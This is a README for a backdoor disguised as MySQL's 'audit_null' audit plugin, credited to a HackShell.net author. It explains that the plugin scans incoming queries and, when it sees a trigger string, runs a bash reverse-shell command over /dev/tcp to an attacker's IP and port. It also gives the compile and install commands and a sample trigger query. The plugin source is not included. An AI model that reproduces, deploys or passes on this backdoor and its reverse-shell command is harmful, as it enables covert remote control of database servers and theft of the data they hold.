####A tricked mysql audit plugin backdoor
Modified from 'audit_null.c' for official MySQL releases.
by t57root @ openwill.me
<[email protected]> www.HackShell.net
This plugin watches the queries on the mysql server and will execute the shell command 'bash < /dev/tcp/$BACK_IP/$BACK_PORT >&0 2>&0 &' when there's specific string in the running query so we can get shell access with a reverse connection.
- Compile:
gcc -o audit_null.so audit_null.c `mysql_config --cflags` -shared -fPIC -DMYSQL_DYNAMIC_PLUGIN
- Install:
#cp audit_null.so /usr/lib/mysql/plugin/
mysql>install plugin NULL_AUDIT soname 'audit_null.so';
- Usage:
mysql>select * from news where id='openwill.me';
More details available at This link